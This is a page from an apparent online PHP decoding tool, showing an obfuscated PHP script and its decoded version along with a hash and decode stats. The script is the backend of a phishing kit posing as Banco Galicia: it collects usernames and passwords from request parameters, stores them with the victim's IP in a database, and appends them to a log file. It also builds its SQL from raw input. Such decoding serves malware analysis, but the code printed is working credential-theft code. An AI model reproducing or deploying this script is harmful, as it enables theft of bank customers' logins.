Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto k8TTG; pN6ow: $conexion = mysqli_connect($servername, $username, $password, $..
Decoded Output download
<?php
goto k8TTG; pN6ow: $conexion = mysqli_connect($servername, $username, $password, $dbname); goto DubuX; vM8iY: include "../panel/dbcall.php"; goto pN6ow; g8hGe: if (isset($_GET["usuario"]) && isset($_GET["clave"]) && !empty($_GET["usuario"]) || !empty($_GET["clave"])) { $user = $_GET["usuario"]; $pass = $_GET["clave"]; $identificador = rand(0, 999999); $_SESSION["identificador"] = $identificador; $estado = "Ususario en espera"; $sql = "INSERT INTO {$table_name} (usuario_log, pass_log, Ip, stats, identificador) VALUES ('{$user}', '{$pass}', '{$client}','{$estado}', {$identificador})"; mysqli_query($conexion, $sql); echo "{"status":"success","errordescription":"none","number":"302"}"; $logAccesos = fopen("../" . $txt, "a+"); fwrite($logAccesos, "
--------------BANCO GALICIA--------------\xaID : " . $identificador . "
\xaUSER: " . $user . "
PASS : " . $pass . "\xa--------------------------------------\xd
"); fclose($logAccesos); } else { echo "{"status":"fail","errordescription":"Faltan datos","number":"404"}"; } goto IGC8o; DubuX: if (!$conexion) { die("Error de conexi\303\263n a la base de datos: " . mysqli_connect_error()); } goto RdCRV; k8TTG: session_start(); goto G8vyP; Q9veQ: $ipp = ''; goto ecoQX; aw8JH: $ip_version = filter_var($client, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4); goto HPlXt; RdCRV: include "../panel/dbcall.php"; goto id3hd; ecoQX: $forward = isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : ''; goto LaXkh; id3hd: $client = isset($_SERVER["HTTP_X_REAL_IP"]) ? $_SERVER["HTTP_X_REAL_IP"] : $_SERVER["REMOTE_ADDR"]; goto aw8JH; C7ayU: if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $_SESSION["_ip_"] = $ip = $forward; } else { $_SESSION["_ip_"] = $ip = $remote; } goto g8hGe; LaXkh: $remote = $_SERVER["REMOTE_ADDR"]; goto m19Lb; m19Lb: $result = "Unknown"; goto C7ayU; G8vyP: include "../config.php"; goto vM8iY; HPlXt: if (!$client) { $ip_binary = inet_pton($client); $client = inet_ntop(substr($ip_binary, 12)); } goto Q9veQ; IGC8o: ?>
Did this file decode correctly?
Original Code
<?php
goto k8TTG; pN6ow: $conexion = mysqli_connect($servername, $username, $password, $dbname); goto DubuX; vM8iY: include "\x2e\x2e\x2f\x70\x61\x6e\145\154\x2f\144\x62\143\x61\x6c\x6c\x2e\x70\x68\x70"; goto pN6ow; g8hGe: if (isset($_GET["\165\163\x75\x61\162\151\x6f"]) && isset($_GET["\143\154\141\166\145"]) && !empty($_GET["\165\x73\165\141\x72\151\157"]) || !empty($_GET["\143\x6c\141\166\145"])) { $user = $_GET["\165\x73\x75\x61\162\151\157"]; $pass = $_GET["\143\x6c\x61\x76\x65"]; $identificador = rand(0, 999999); $_SESSION["\151\x64\x65\156\164\151\146\151\143\141\x64\x6f\x72"] = $identificador; $estado = "\125\x73\165\163\141\x72\151\x6f\x20\x65\156\40\145\x73\160\145\162\141"; $sql = "\111\x4e\123\105\x52\124\x20\111\x4e\x54\x4f\x20{$table_name}\40\x28\x75\x73\165\x61\x72\151\157\137\154\x6f\x67\x2c\x20\x70\141\x73\x73\x5f\x6c\157\147\x2c\40\111\160\54\40\163\x74\x61\164\x73\54\40\x69\144\x65\156\x74\x69\x66\151\143\x61\144\x6f\x72\51\40\126\x41\114\125\x45\x53\40\50\47{$user}\x27\x2c\x20\x27{$pass}\x27\54\x20\x27{$client}\47\x2c\47{$estado}\x27\54\x20{$identificador}\51"; mysqli_query($conexion, $sql); echo "\x7b\x22\x73\x74\141\x74\165\x73\x22\x3a\42\163\165\x63\143\x65\x73\x73\42\54\42\145\162\x72\x6f\x72\144\145\163\x63\162\151\160\x74\151\157\156\42\72\42\156\x6f\156\x65\x22\54\x22\x6e\165\155\142\x65\x72\x22\72\x22\x33\60\x32\42\175"; $logAccesos = fopen("\56\x2e\x2f" . $txt, "\x61\x2b"); fwrite($logAccesos, "\12\x2d\55\x2d\x2d\x2d\55\55\55\55\x2d\x2d\55\55\55\x42\x41\x4e\103\117\x20\107\101\114\111\103\x49\101\55\55\55\55\x2d\55\55\x2d\x2d\x2d\55\55\x2d\55\xa\x49\x44\x20\72\x20" . $identificador . "\12\xa\125\123\x45\x52\x3a\x20" . $user . "\x20\12\120\101\123\123\40\72\x20" . $pass . "\xa\55\x2d\55\x2d\55\55\55\x2d\x2d\x2d\x2d\55\55\x2d\55\55\x2d\x2d\55\55\x2d\x2d\x2d\55\55\55\55\55\55\x2d\x2d\55\55\x2d\55\x2d\x2d\55\xd\12"); fclose($logAccesos); } else { echo "\x7b\42\163\x74\x61\164\165\163\42\72\x22\146\x61\151\x6c\42\x2c\42\x65\162\x72\x6f\x72\144\145\x73\x63\x72\151\x70\x74\151\157\156\42\x3a\42\106\x61\x6c\x74\x61\x6e\x20\x64\141\x74\157\x73\x22\x2c\42\x6e\165\155\142\x65\162\42\x3a\42\64\60\x34\x22\x7d"; } goto IGC8o; DubuX: if (!$conexion) { die("\105\162\x72\157\x72\40\x64\x65\x20\143\157\x6e\x65\x78\151\303\263\x6e\40\141\40\154\141\40\142\141\163\145\40\x64\x65\40\144\141\164\157\x73\72\x20" . mysqli_connect_error()); } goto RdCRV; k8TTG: session_start(); goto G8vyP; Q9veQ: $ipp = ''; goto ecoQX; aw8JH: $ip_version = filter_var($client, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4); goto HPlXt; RdCRV: include "\x2e\x2e\x2f\160\x61\156\x65\x6c\x2f\144\x62\x63\x61\154\154\56\160\x68\x70"; goto id3hd; ecoQX: $forward = isset($_SERVER["\x48\124\x54\120\137\130\137\106\x4f\122\x57\x41\122\104\x45\104\137\x46\117\122"]) ? $_SERVER["\x48\x54\124\x50\x5f\x58\137\106\117\x52\x57\101\x52\x44\105\x44\x5f\x46\117\122"] : ''; goto LaXkh; id3hd: $client = isset($_SERVER["\110\x54\x54\120\137\130\x5f\122\105\101\114\x5f\111\120"]) ? $_SERVER["\x48\124\x54\x50\x5f\130\x5f\122\x45\x41\114\x5f\111\x50"] : $_SERVER["\x52\105\115\117\x54\105\x5f\x41\x44\104\122"]; goto aw8JH; C7ayU: if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $_SESSION["\137\151\x70\x5f"] = $ip = $forward; } else { $_SESSION["\x5f\151\160\137"] = $ip = $remote; } goto g8hGe; LaXkh: $remote = $_SERVER["\122\105\115\117\x54\105\137\101\104\x44\x52"]; goto m19Lb; m19Lb: $result = "\125\156\x6b\x6e\157\x77\156"; goto C7ayU; G8vyP: include "\x2e\x2e\57\143\x6f\x6e\x66\x69\147\x2e\x70\150\160"; goto vM8iY; HPlXt: if (!$client) { $ip_binary = inet_pton($client); $client = inet_ntop(substr($ip_binary, 12)); } goto Q9veQ; IGC8o: ?>
Function Calls
None |
Stats
MD5 | ba64b9b485b233de005eba2b69d1d4a1 |
Eval Count | 0 |
Decode Time | 34 ms |